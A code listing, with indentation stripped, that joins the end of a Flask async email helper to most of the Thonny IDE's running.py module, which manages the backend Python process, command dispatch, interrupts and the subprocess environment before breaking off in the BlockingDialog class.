with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MONSTER_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['MONSTER_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
running.py
|
# -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
import logging
import os.path
import re
import shlex
import signal
import subprocess
import sys
import time
import tkinter as tk
import warnings
from logging import debug
from threading import Thread
from time import sleep
from tkinter import messagebox, ttk
from typing import Any, List, Optional, Set # @UnusedImport; @UnusedImport
from thonny import THONNY_USER_DIR, common, get_runner, get_shell, get_workbench
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
EOFCommand,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
is_same_path,
normpath_with_actual_case,
parse_message,
path_startswith,
serialize_message,
update_system_path,
MessageFromBackend,
universal_relpath,
)
from thonny.editors import (
get_current_breakpoints,
get_saved_current_script_filename,
is_remote_path,
is_local_path,
get_target_dirname_from_editor_filename,
extract_target_path,
)
from thonny.languages import tr
from thonny.misc_utils import construct_cmd_line, running_on_mac_os, running_on_windows
from thonny.ui_utils import CommonDialogEx, select_sequence, show_dialog
WINDOWS_EXE = "python.exe"
OUTPUT_MERGE_THRESHOLD = 1000
RUN_COMMAND_LABEL = "" # init later when gettext is ready
RUN_COMMAND_CAPTION = ""
EDITOR_CONTENT_TOKEN = "$EDITOR_CONTENT"
EXPECTED_TERMINATION_CODE = 123
INTERRUPT_SEQUENCE = "<Control-c>"
ANSI_CODE_TERMINATOR = re.compile("[@-~]")
# other components may turn it on in order to avoid grouping output lines into one event
io_animation_required = False
_console_allocated = False
class Runner:
def __init__(self) -> None:
get_workbench().set_default("run.auto_cd", True)
self._init_commands()
self._state = "starting"
self._proxy = None # type: BackendProxy
self._publishing_events = False
self._polling_after_id = None
self._postponed_commands = [] # type: List[CommandToBackend]
def _remove_obsolete_jedi_copies(self) -> None:
# Thonny 2.1 used to copy jedi in order to make it available
# for the backend. Get rid of it now
for item in os.listdir(THONNY_USER_DIR):
if item.startswith("jedi_0."):
import shutil
shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)
def start(self) -> None:
global _console_allocated
try:
self._check_alloc_console()
_console_allocated = True
except Exception:
logging.getLogger("thonny").exception("Problem allocating console")
_console_allocated = False
self.restart_backend(False, True)
# temporary
self._remove_obsolete_jedi_copies()
def _init_commands(self) -> None:
global RUN_COMMAND_CAPTION, RUN_COMMAND_LABEL
RUN_COMMAND_LABEL = tr("Run current script")
RUN_COMMAND_CAPTION = tr("Run")
get_workbench().set_default("run.run_in_terminal_python_repl", False)
get_workbench().set_default("run.run_in_terminal_keep_open", True)
try:
import thonny.plugins.debugger # @UnusedImport
debugger_available = True
except ImportError:
debugger_available = False
get_workbench().add_command(
"run_current_script",
"run",
RUN_COMMAND_LABEL,
caption=RUN_COMMAND_CAPTION,
handler=self.cmd_run_current_script,
default_sequence="<F5>",
extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
tester=self.cmd_run_current_script_enabled,
group=10,
image="run-current-script",
include_in_toolbar=not (get_workbench().in_simple_mode() and debugger_available),
show_extra_sequences=True,
)
get_workbench().add_command(
"run_current_script_in_terminal",
"run",
tr("Run current script in terminal"),
caption="RunT",
handler=self._cmd_run_current_script_in_terminal,
default_sequence="<Control-t>",
extra_sequences=["<<CtrlTInText>>"],
tester=self._cmd_run_current_script_in_terminal_enabled,
group=35,
image="terminal",
)
get_workbench().add_command(
"restart",
"run",
tr("Stop/Restart backend"),
caption=tr("Stop"),
handler=self.cmd_stop_restart,
default_sequence="<Control-F2>",
group=100,
image="stop",
include_in_toolbar=True,
)
get_workbench().add_command(
"interrupt",
"run",
tr("Interrupt execution"),
handler=self._cmd_interrupt,
tester=self._cmd_interrupt_enabled,
default_sequence=INTERRUPT_SEQUENCE,
skip_sequence_binding=True, # Sequence will be bound differently
group=100,
bell_when_denied=False,
)
get_workbench().bind(INTERRUPT_SEQUENCE, self._cmd_interrupt_with_shortcut, True)
get_workbench().add_command(
"ctrld",
"run",
tr("Send EOF / Soft reboot"),
self.ctrld,
self.ctrld_enabled,
group=100,
default_sequence="<Control-d>",
extra_sequences=["<<CtrlDInText>>"],
)
get_workbench().add_command(
"disconnect",
"run",
tr("Disconnect"),
self.disconnect,
self.disconnect_enabled,
group=100,
)
def get_state(self) -> str:
"""State is one of "running", "waiting_debugger_command", "waiting_toplevel_command" """
return self._state
def _set_state(self, state: str) -> None:
if self._state != state:
logging.debug("Runner state changed: %s ==> %s" % (self._state, state))
self._state = state
def is_running(self):
return self._state == "running"
def is_waiting(self):
return self._state.startswith("waiting")
def is_waiting_toplevel_command(self):
return self._state == "waiting_toplevel_command"
def is_waiting_debugger_command(self):
return self._state == "waiting_debugger_command"
def get_sys_path(self) -> List[str]:
return self._proxy.get_sys_path()
def send_command(self, cmd: CommandToBackend) -> None:
if self._proxy is None:
return
if self._publishing_events:
# allow all event handlers to complete before sending the commands
# issued by first event handlers
self._postpone_command(cmd)
return
# First sanity check
if (
isinstance(cmd, ToplevelCommand)
and not self.is_waiting_toplevel_command()
and cmd.name not in ["Reset", "Run", "Debug"]
or isinstance(cmd, DebuggerCommand)
and not self.is_waiting_debugger_command()
):
get_workbench().bell()
logging.warning(
"RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state())
)
return
# Attach extra info
if "debug" in cmd.name.lower():
cmd["breakpoints"] = get_current_breakpoints()
if "id" not in cmd:
cmd["id"] = generate_command_id()
cmd["local_cwd"] = get_workbench().get_local_cwd()
# Offer the command
logging.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
response = self._proxy.send_command(cmd)
if response == "discard":
return None
elif response == "postpone":
self._postpone_command(cmd)
return
else:
assert response is None
get_workbench().event_generate("CommandAccepted", command=cmd)
if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
self._set_state("running")
if cmd.name[0].isupper():
get_workbench().event_generate("BackendRestart", full=False)
def send_command_and_wait(self, cmd: CommandToBackend, dialog_title: str) -> MessageFromBackend:
self.send_command(cmd)
dlg = BlockingDialog(get_workbench(), cmd, title=dialog_title + " ...")
show_dialog(dlg)
return dlg.response
def _postpone_command(self, cmd: CommandToBackend) -> None:
# in case of InlineCommands, discard older same type command
if isinstance(cmd, InlineCommand):
for older_cmd in self._postponed_commands:
if older_cmd.name == cmd.name:
self._postponed_commands.remove(older_cmd)
if len(self._postponed_commands) > 10:
logging.warning("Can't pile up too many commands. This command will be just ignored")
else:
self._postponed_commands.append(cmd)
def _send_postponed_commands(self) -> None:
todo = self._postponed_commands
self._postponed_commands = []
for cmd in todo:
logging.debug("Sending postponed command: %s", cmd)
self.send_command(cmd)
def send_program_input(self, data: str) -> None:
assert self.is_running()
self._proxy.send_program_input(data)
def execute_script(
self,
script_path: str,
args: List[str],
working_directory: Optional[str] = None,
command_name: str = "Run",
) -> None:
if self._proxy.get_cwd() != working_directory:
# create compound command
# start with %cd
cd_cmd_line = construct_cd_command(working_directory) + "\n"
else:
# create simple command
cd_cmd_line = ""
rel_filename = universal_relpath(script_path, working_directory)
cmd_parts = ["%" + command_name, rel_filename] + args
exe_cmd_line = construct_cmd_line(cmd_parts, [EDITOR_CONTENT_TOKEN]) + "\n"
# submit to shell (shell will execute it)
get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)
def execute_editor_content(self, command_name, args):
get_shell().submit_magic_command(
construct_cmd_line(
["%" + command_name, "-c", EDITOR_CONTENT_TOKEN] + args, [EDITOR_CONTENT_TOKEN]
)
)
def execute_current(self, command_name: str) -> None:
"""
This method's job is to create a command for running/debugging
current file/script and submit it to shell
"""
if not self.is_waiting_toplevel_command():
self.restart_backend(True, False, 2)
filename = get_saved_current_script_filename()
if not filename:
# user has cancelled file saving
return
if (
is_remote_path(filename)
and not self._proxy.can_run_remote_files()
or is_local_path(filename)
and not self._proxy.can_run_local_files()
):
self.execute_editor_content(command_name, self._get_active_arguments())
else:
if get_workbench().get_option("run.auto_cd") and command_name[0].isupper():
working_directory = get_target_dirname_from_editor_filename(filename)
else:
working_directory = self._proxy.get_cwd()
if is_local_path(filename):
target_path = filename
else:
target_path = extract_target_path(filename)
self.execute_script(
target_path, self._get_active_arguments(), working_directory, command_name
)
def _get_active_arguments(self):
if get_workbench().get_option("view.show_program_arguments"):
args_str = get_workbench().get_option("run.program_arguments")
get_workbench().log_program_arguments_string(args_str)
return shlex.split(args_str)
else:
return []
def cmd_run_current_script_enabled(self) -> bool:
return (
get_workbench().get_editor_notebook().get_current_editor() is not None
and "run" in get_runner().get_supported_features()
)
def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
return (
self._proxy
and "run_in_terminal" in self._proxy.get_supported_features()
and self.cmd_run_current_script_enabled()
)
def cmd_run_current_script(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.execute_current("Run")
def _cmd_run_current_script_in_terminal(self) -> None:
filename = get_saved_current_script_filename()
self._proxy.run_script_in_terminal(
filename,
self._get_active_arguments(),
get_workbench().get_option("run.run_in_terminal_python_repl"),
get_workbench().get_option("run.run_in_terminal_keep_open"),
)
def _cmd_interrupt(self) -> None:
if self._proxy is not None:
if _console_allocated:
self._proxy.interrupt()
else:
messagebox.showerror(
"No console",
"Can't interrupt as console was not allocated.\n\nUse Stop/Restart instead.",
)
else:
logging.warning("User tried interrupting without proxy")
def _cmd_interrupt_with_shortcut(self, event=None):
if not self._cmd_interrupt_enabled():
return None
if not running_on_mac_os(): # on Mac Ctrl+C is not used for Copy.
# Disable Ctrl+C interrupt in editor and shell, when some text is selected
# (assuming user intended to copy instead of interrupting)
widget = get_workbench().focus_get()
if isinstance(widget, tk.Text):
if len(widget.tag_ranges("sel")) > 0:
# this test is reliable, unlike selection_get below
return None
elif isinstance(widget, (tk.Listbox, ttk.Entry, tk.Entry, tk.Spinbox)):
try:
selection = widget.selection_get()
if isinstance(selection, str) and len(selection) > 0:
# Assuming user meant to copy, not interrupt
# (IDLE seems to follow same logic)
# NB! This is not perfect, as in Linux the selection can be in another app
# ie. there may be no selection in Thonny actually.
# In other words, Ctrl+C interrupt may be dropped without reason
# when given inside the widgets listed above.
return None
except Exception:
# widget either doesn't have selection_get or it
# gave error (can happen without selection on Ubuntu)
pass
self._cmd_interrupt()
return "break"
def _cmd_interrupt_enabled(self) -> bool:
return self._proxy and self._proxy.is_connected()
def cmd_stop_restart(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.restart_backend(True)
def disconnect(self):
proxy = self.get_backend_proxy()
assert hasattr(proxy, "disconnect")
proxy.disconnect()
def disconnect_enabled(self):
return hasattr(self.get_backend_proxy(), "disconnect")
def ctrld(self):
proxy = self.get_backend_proxy()
if not proxy:
return
if get_shell().has_pending_input():
messagebox.showerror(
"Can't perform this action",
"Ctrl+D only has effect on an empty line / prompt.\n"
+ "Submit current input (press ENTER) and try again",
)
return
proxy.send_command(EOFCommand())
self._set_state("running")
def ctrld_enabled(self):
proxy = self.get_backend_proxy()
return proxy and proxy.is_connected()
def _poll_backend_messages(self) -> None:
"""I chose polling instead of event_generate in listener thread,
because event_generate across threads is not reliable
http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
"""
self._polling_after_id = None
if self._pull_backend_messages() is False:
return
self._polling_after_id = get_workbench().after(20, self._poll_backend_messages)
def _pull_backend_messages(self):
while self._proxy is not None:
try:
msg = self._proxy.fetch_next_message()
if not msg:
break
logging.debug(
"RUNNER GOT: %s, %s in state: %s", msg.event_type, msg, self.get_state()
)
except BackendTerminatedError as exc:
self._report_backend_crash(exc)
self.destroy_backend()
return False
if msg.get("SystemExit", False):
self.restart_backend(True)
return False
# change state
if isinstance(msg, ToplevelResponse):
self._set_state("waiting_toplevel_command")
elif isinstance(msg, DebuggerResponse):
self._set_state("waiting_debugger_command")
else:
"other messages don't affect the state"
# Publish the event
# NB! This may cause another command to be sent before we get to postponed commands.
try:
self._publishing_events = True
class_event_type = type(msg).__name__
get_workbench().event_generate(class_event_type, event=msg) # more general event
if msg.event_type != class_event_type:
# more specific event
get_workbench().event_generate(msg.event_type, event=msg)
finally:
self._publishing_events = False
# TODO: is it necessary???
# https://stackoverflow.com/a/13520271/261181
# get_workbench().update()
self._send_postponed_commands()
def _report_backend_crash(self, exc: Exception) -> None:
returncode = getattr(exc, "returncode", "?")
err = "Backend terminated or disconnected."
try:
faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
if os.path.exists(faults_file):
with open(faults_file, encoding="ASCII") as fp:
err += fp.read()
except Exception:
logging.exception("Failed retrieving backend faults")
err = err.strip() + " Use 'Stop/Restart' to restart.\n"
if returncode != EXPECTED_TERMINATION_CODE:
get_workbench().event_generate("ProgramOutput", stream_name="stderr", data="\n" + err)
get_workbench().become_active_window(False)
def restart_backend(self, clean: bool, first: bool = False, wait: float = 0) -> None:
"""Recreate (or replace) backend proxy / backend process."""
if not first:
get_shell().restart()
get_shell().update_idletasks()
self.destroy_backend()
backend_name = get_workbench().get_option("run.backend_name")
if backend_name not in get_workbench().get_backends():
raise UserError(
"Can't find backend '{}'. Please select another backend from options".format(
backend_name
)
)
backend_class = get_workbench().get_backends()[backend_name].proxy_class
self._set_state("running")
self._proxy = None
self._proxy = backend_class(clean)
self._poll_backend_messages()
if wait:
start_time = time.time()
while not self.is_waiting_toplevel_command() and time.time() - start_time <= wait:
# self._pull_backend_messages()
get_workbench().update()
sleep(0.01)
get_workbench().event_generate("BackendRestart", full=True)
def destroy_backend(self) -> None:
if self._polling_after_id is not None:
get_workbench().after_cancel(self._polling_after_id)
self._polling_after_id = None
self._postponed_commands = []
if self._proxy:
self._proxy.destroy()
self._proxy = None
get_workbench().event_generate("BackendTerminated")
def get_local_executable(self) -> Optional[str]:
if self._proxy is None:
return None
else:
return self._proxy.get_local_executable()
def get_backend_proxy(self) -> "BackendProxy":
return self._proxy
def _check_alloc_console(self) -> None:
if sys.executable.endswith("pythonw.exe"):
# These don't have console allocated.
# Console is required for sending interrupts.
# AllocConsole would be easier but flashes console window
import ctypes
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
exe = sys.executable.replace("pythonw.exe", "python.exe")
cmd = [exe, "-c", "print('Hi!'); input()"]
child = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
child.stdout.readline()
result = kernel32.AttachConsole(child.pid)
if not result:
err = ctypes.get_last_error()
logging.info("Could not allocate console. Error code: " + str(err))
child.stdin.write(b"\n")
try:
child.stdin.flush()
except Exception:
# May happen eg. when installation path has "&" in it
# See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
# Without flush the console window becomes visible, but Thonny can be still used
logging.getLogger("thonny").exception("Problem with finalizing console allocation")
def ready_for_remote_file_operations(self, show_message=False):
if not self._proxy or not self.supports_remote_files():
return False
ready = self._proxy.ready_for_remote_file_operations()
if not ready and show_message:
if self._proxy.is_connected():
msg = "Device is not connected"
else:
msg = (
"Device is busy -- can't perform this action now."
+ "\nPlease wait or cancel current work and try again!",
)
messagebox.showerror("Can't complete", msg)
return ready
def get_supported_features(self) -> Set[str]:
if self._proxy is None:
return set()
else:
return self._proxy.get_supported_features()
def supports_remote_files(self):
if self._proxy is None:
return False
else:
return self._proxy.supports_remote_files()
def supports_remote_directories(self):
if self._proxy is None:
return False
else:
return self._proxy.supports_remote_directories()
def get_node_label(self):
if self._proxy is None:
return "Back-end"
else:
return self._proxy.get_node_label()
def using_venv(self) -> bool:
from thonny.plugins.cpython import CPythonProxy
return isinstance(self._proxy, CPythonProxy) and self._proxy._in_venv
class BackendProxy:
"""Communicates with backend process.
All communication methods must be non-blocking,
ie. suitable for calling from GUI thread."""
# backend_name will be overwritten on Workbench.add_backend
# Subclasses don't need to worry about it.
backend_name = None
def __init__(self, clean: bool) -> None:
"""Initializes (or starts the initialization of) the backend process.
Backend is considered ready when the runner gets a ToplevelResponse
with attribute "welcome_text" from fetch_next_message.
"""
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
raise NotImplementedError()
def send_program_input(self, data: str) -> None:
"""Send input data to backend"""
raise NotImplementedError()
def fetch_next_message(self):
"""Read next message from the queue or None if queue is empty"""
raise NotImplementedError()
def run_script_in_terminal(self, script_path, args, interactive, keep_open):
raise NotImplementedError()
def get_sys_path(self):
"backend's sys.path"
return []
def get_backend_name(self):
return type(self).backend_name
def get_pip_gui_class(self):
return None
def interrupt(self):
"""Tries to interrupt current command without reseting the backend"""
pass
def destroy(self):
"""Called when Thonny no longer needs this instance
(Thonny gets closed or new backend gets selected)
"""
pass
def is_connected(self):
return True
def get_local_executable(self):
"""Return system command for invoking current interpreter"""
return None
def get_supported_features(self):
return {"run"}
def get_node_label(self):
"""Used as files caption if back-end has separate files"""
return "Back-end"
def get_full_label(self):
"""Used in pip GUI title"""
return self.get_node_label()
def supports_remote_files(self):
"""Whether remote file browser should be presented with this back-end"""
return False
def uses_local_filesystem(self):
"""Whether it runs code from local files"""
return True
def supports_remote_directories(self):
return False
def supports_trash(self):
return True
def can_run_remote_files(self):
raise NotImplementedError()
def can_run_local_files(self):
raise NotImplementedError()
def ready_for_remote_file_operations(self):
return False
def get_cwd(self):
return None
class SubprocessProxy(BackendProxy):
def __init__(self, clean: bool, executable: Optional[str] = None) -> None:
super().__init__(clean)
if executable:
self._executable = executable
else:
self._executable = get_interpreter_for_subprocess()
self._welcome_text = ""
self._proc = None
self._response_queue = None
self._sys_path = []
self._usersitepackages = None
self._gui_update_loop_id = None
self._in_venv = None
self._cwd = self._get_initial_cwd() # pylint: disable=assignment-from-none
self._start_background_process(clean=clean)
def _get_initial_cwd(self):
return None
def _start_background_process(self, clean=None, extra_args=[]):
# deque, because in one occasion I need to put messages back
self._response_queue = collections.deque()
# prepare environment
env = get_environment_for_python_subprocess(self._executable)
# variables controlling communication with the back-end process
env["PYTHONIOENCODING"] = "utf-8"
# because cmd line option -u won't reach child processes
# see https://github.com/thonny/thonny/issues/808
env["PYTHONUNBUFFERED"] = "1"
# Let back-end know about plug-ins
env["THONNY_USER_DIR"] = THONNY_USER_DIR
env["THONNY_FRONTEND_SYS_PATH"] = repr(sys.path)
env["THONNY_LANGUAGE"] = get_workbench().get_option("general.language")
env["FRIENDLY_TRACEBACK_LEVEL"] = str(
get_workbench().get_option("assistance.friendly_traceback_level")
)
if get_workbench().in_debug_mode():
env["THONNY_DEBUG"] = "1"
elif "THONNY_DEBUG" in env:
del env["THONNY_DEBUG"]
if not os.path.exists(self._executable):
raise UserError(
"Interpreter (%s) not found. Please recheck corresponding option!"
% self._executable
)
cmd_line = (
[
self._executable,
"-u", # unbuffered IO
"-B", # don't write pyo/pyc files
# (to avoid problems when using different Python versions without write permissions)
]
+ self._get_launcher_with_args()
+ extra_args
)
creationflags = 0
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
debug("Starting the backend: %s %s", cmd_line, get_workbench().get_local_cwd())
extra_params = {}
if sys.version_info >= (3, 6):
extra_params["encoding"] = "utf-8"
self._proc = subprocess.Popen(
cmd_line,
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self._get_launch_cwd(),
env=env,
universal_newlines=True,
creationflags=creationflags,
**extra_params
)
# setup asynchronous output listeners
Thread(target=self._listen_stdout, args=(self._proc.stdout,), daemon=True).start()
Thread(target=self._listen_stderr, args=(self._proc.stderr,), daemon=True).start()
def _get_launch_cwd(self):
return self.get_cwd() if self.uses_local_filesystem() else None
def _get_launcher_with_args(self):
raise NotImplementedError()
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
self._clear_environment()
if isinstance(cmd, ToplevelCommand):
# required by SshCPythonBackend for creating fresh target process
cmd["expected_cwd"] = self._cwd
method_name = "_cmd_" + cmd.name
if hasattr(self, method_name):
getattr(self, method_name)(cmd)
else:
self._send_msg(cmd)
def _send_msg(self, msg):
self._proc.stdin.write(serialize_message(msg) + "\n")
self._proc.stdin.flush()
def _clear_environment(self):
pass
def send_program_input(self, data):
self._send_msg(InputSubmission(data))
def process_is_alive(self):
return self._proc is not None and self._proc.poll() is None
def is_terminated(self):
return not self.process_is_alive()
def is_connected(self):
return self.process_is_alive()
def get_sys_path(self):
return self._sys_path
def interrupt(self):
if self._proc is not None and self._proc.poll() is None:
if running_on_windows():
try:
os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT) # pylint: disable=no-member
except Exception:
logging.exception("Could not interrupt backend process")
else:
self._proc.send_signal(signal.SIGINT)
def destroy(self):
self._close_backend()
def _close_backend(self):
if self._proc is not None and self._proc.poll() is None:
self._proc.kill()
self._proc = None
self._response_queue = None
def _listen_stdout(self, stdout):
# debug("... started listening to stdout")
# will be called from separate thread
message_queue = self._response_queue
def publish_as_msg(data):
msg = parse_message(data)
if "cwd" in msg:
self.cwd = msg["cwd"]
message_queue.append(msg)
if len(message_queue) > 50:
# Probably backend runs an infinite/long print loop.
# Throttle message thougput in order to keep GUI thread responsive.
while len(message_queue) > 0:
sleep(0.1)
while self.process_is_alive():
try:
data = stdout.readline()
except IOError:
sleep(0.1)
continue
# debug("... read some stdout data", repr(data))
if data == "":
break
else:
try:
publish_as_msg(data)
except Exception:
# Can mean the line was from subprocess,
# which can't be captured by stream faking.
# NB! If subprocess printed it without linebreak,
# then the suffix can be thonny message
parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)
# print first part as it is
message_queue.append(
BackendEvent("ProgramOutput", data=parts[0], stream_name="stdout")
)
if len(parts) == 2:
second_part = common.MESSAGE_MARKER + parts[1]
try:
publish_as_msg(second_part)
except Exception:
# just print ...
message_queue.append(
BackendEvent(
"ProgramOutput", data=second_part, stream_name="stdout"
)
)
def _listen_stderr(self, stderr):
# stderr is used only for debugger debugging
while self.process_is_alive():
data = stderr.readline()
if data == "":
break
else:
self._response_queue.append(
BackendEvent("ProgramOutput", stream_name="stderr", data=data)
)
def _store_state_info(self, msg):
if "cwd" in msg:
self._cwd = msg["cwd"]
self._publish_cwd(msg["cwd"])
if msg.get("welcome_text"):
self._welcome_text = msg["welcome_text"]
if "in_venv" in msg:
self._in_venv = msg["in_venv"]
if "sys_path" in msg:
self._sys_path = msg["sys_path"]
if "usersitepackages" in msg:
self._usersitepackages = msg["usersitepackages"]
if "prefix" in msg:
self._sys_prefix = msg["prefix"]
if "exe_dirs" in msg:
self._exe_dirs = msg["exe_dirs"]
if msg.get("executable"):
self._reported_executable = msg["executable"]
def _publish_cwd(self, cwd):
if self.uses_local_filesystem():
get_workbench().set_local_cwd(cwd)
def get_supported_features(self):
return {"run"}
def get_site_packages(self):
# NB! site.sitepackages may not be present in virtualenv
for d in self._sys_path:
if ("site-packages" in d or "dist-packages" in d) and path_startswith(
d, self._sys_prefix
):
return d
return None
def get_user_site_packages(self):
return self._usersitepackages
def get_cwd(self):
return self._cwd
def get_exe_dirs(self):
return self._exe_dirs
def fetch_next_message(self):
if not self._response_queue or len(self._response_queue) == 0:
if self.is_terminated():
raise BackendTerminatedError(self._proc.returncode if self._proc else None)
else:
return None
msg = self._response_queue.popleft()
self._store_state_info(msg)
if not hasattr(msg, "event_type"):
print("gotww", msg)
if msg.event_type == "ProgramOutput":
# combine available small output messages to one single message,
# in order to put less pressure on UI code
wait_time = 0.01
total_wait_time = 0
while True:
if len(self._response_queue) == 0:
if _ends_with_incomplete_ansi_code(msg["data"]) and total_wait_time < 0.1:
# Allow reader to send the remaining part
sleep(wait_time)
total_wait_time += wait_time
continue
else:
return msg
else:
next_msg = self._response_queue.popleft()
if (
next_msg.event_type == "ProgramOutput"
and next_msg["stream_name"] == msg["stream_name"]
and (
len(msg["data"]) + len(next_msg["data"]) <= OUTPUT_MERGE_THRESHOLD
and ("\n" not in msg["data"] or not io_animation_required)
or _ends_with_incomplete_ansi_code(msg["data"])
)
):
msg["data"] += next_msg["data"]
else:
# not to be sent in the same block, put it back
self._response_queue.appendleft(next_msg)
return msg
else:
return msg
def _ends_with_incomplete_ansi_code(data):
pos = data.rfind("\033")
if pos == -1:
return False
# note ANSI_CODE_TERMINATOR also includes [
params_and_terminator = data[pos + 2 :]
return not ANSI_CODE_TERMINATOR.search(params_and_terminator)
def is_bundled_python(executable):
return os.path.exists(os.path.join(os.path.dirname(executable), "thonny_python.ini"))
def create_backend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. pip) on CPython backend.
Assumes current backend is CPython."""
# TODO: if backend == frontend, then delegate to create_frontend_python_process
python_exe = get_runner().get_local_executable()
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
# TODO: remove frontend python from path and add backend python to it
return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def create_frontend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. for installing plug-ins on by the plug-ins)"""
if _console_allocated:
python_exe = get_interpreter_for_subprocess().replace("pythonw.exe", "python.exe")
else:
python_exe = get_interpreter_for_subprocess().replace("python.exe", "pythonw.exe")
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
return _create_python_process(python_exe, args, stdin, stdout, stderr)
def _create_python_process(
python_exe,
args,
stdin=None,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=False,
env=None,
universal_newlines=True,
):
cmd = [python_exe] + args
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
startupinfo = None
creationflags = 0
proc = subprocess.Popen(
cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
shell=shell,
env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags,
)
proc.cmd = cmd
return proc
class BackendTerminatedError(Exception):
def __init__(self, returncode=None):
Exception.__init__(self)
self.returncode = returncode
def is_venv_interpreter_of_current_interpreter(executable):
for location in [".", ".."]:
cfg_path = os.path.join(location, "pyvenv.cfg")
if os.path.isfile(cfg_path):
with open(cfg_path) as fp:
content = fp.read()
for line in content.splitlines():
if line.replace(" ", "").startswith("home="):
_, home = line.split("=", maxsplit=1)
home = home.strip()
if os.path.isdir(home) and os.path.samefile(home, sys.prefix):
return True
return False
def get_environment_for_python_subprocess(target_executable):
overrides = get_environment_overrides_for_python_subprocess(target_executable)
return get_environment_with_overrides(overrides)
def get_environment_with_overrides(overrides):
env = os.environ.copy()
for key in overrides:
if overrides[key] is None and key in env:
del env[key]
else:
assert isinstance(overrides[key], str)
if key.upper() == "PATH":
update_system_path(env, overrides[key])
else:
env[key] = overrides[key]
return env
def get_environment_overrides_for_python_subprocess(target_executable):
"""Take care of not not confusing different interpreter
with variables meant for bundled interpreter"""
# At the moment I'm tweaking the environment only if current
# exe is bundled for Thonny.
# In remaining cases it is user's responsibility to avoid
# calling Thonny with environment which may be confusing for
# different Pythons called in a subprocess.
this_executable = sys.executable.replace("pythonw.exe", "python.exe")
target_executable = target_executable.replace("pythonw.exe", "python.exe")
interpreter_specific_keys = [
"TCL_LIBRARY",
"TK_LIBRARY",
"LD_LIBRARY_PATH",
"DYLD_LIBRARY_PATH",
"SSL_CERT_DIR",
"SSL_CERT_FILE",
"PYTHONHOME",
"PYTHONPATH",
"PYTHONNOUSERSITE",
"PYTHONUSERBASE",
]
result = {}
if os.path.samefile(
target_executable, this_executable
) or is_venv_interpreter_of_current_interpreter(target_executable):
# bring out some important variables so that they can
# be explicitly set in macOS Terminal
# (If they are set then it's most likely because current exe is in Thonny bundle)
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = os.environ[key]
# never pass some variables to different interpreter
# (even if it's venv or symlink to current one)
if not is_same_path(target_executable, this_executable):
for key in ["PYTHONPATH", "PYTHONHOME", "PYTHONNOUSERSITE", "PYTHONUSERBASE"]:
if key in os.environ:
result[key] = None
else:
# interpreters are not related
# interpreter specific keys most likely would confuse other interpreter
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = None
# some keys should be never passed
for key in [
"PYTHONSTARTUP",
"PYTHONBREAKPOINT",
"PYTHONDEBUG",
"PYTHONNOUSERSITE",
"PYTHONASYNCIODEBUG",
]:
if key in os.environ:
result[key] = None
# venv may not find (correct) Tk without assistance (eg. in Ubuntu)
if is_venv_interpreter_of_current_interpreter(target_executable):
try:
if "TCL_LIBRARY" not in os.environ or "TK_LIBRARY" not in os.environ:
result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
except Exception:
logging.exception("Can't compute Tcl/Tk library location")
return result
def construct_cd_command(path) -> str:
return construct_cmd_line(["%cd", path])
_command_id_counter = 0
def generate_command_id():
global _command_id_counter
_command_id_counter += 1
return "cmd_" + str(_command_id_counter)
class BlockingDialog(CommonDialogEx):
def __init__(self, master, cmd, title, mode="indeterminate"):
super().__init__(master)
self.title(title)
self.response = None
self._sent_interrupt = False
self._mode = mode
